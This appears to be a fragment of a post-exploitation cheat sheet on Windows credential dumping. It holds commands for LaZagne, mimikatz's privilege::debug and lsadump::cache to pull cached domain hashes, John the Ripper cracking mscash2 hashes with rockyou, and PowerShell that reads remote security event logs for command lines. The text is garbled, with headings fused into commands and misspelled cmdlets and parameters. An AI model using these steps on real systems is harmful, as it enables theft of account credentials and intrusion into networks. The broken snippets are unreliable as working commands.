Post Exploitation
LaZagne
.\laZagne.exe allMSCash
privilege::debug
lsadump::cachejohn-jumbo mscash --wordlist=/usr/share/wordlists/rockyou.txt --format=mscash2Reading Event Logs
Get-WinEvent -ListLog *
# Listing logs of a specific user
$cred = Get-Credentials
Get -WinEvent -ListLog * -ComputerName AD1 -Credentials $cred
# Reading Security logs
(Get-WinEvent -FilterHashtable @{LogName = 'Security'} | Select-Object @{name='NewProcessNam
e';expression={ $_.Properties[5].Value }}, @{name='CommandLine';expression={
$_.Properties[8].Value }}).commandlinePassword Dumping
Last updated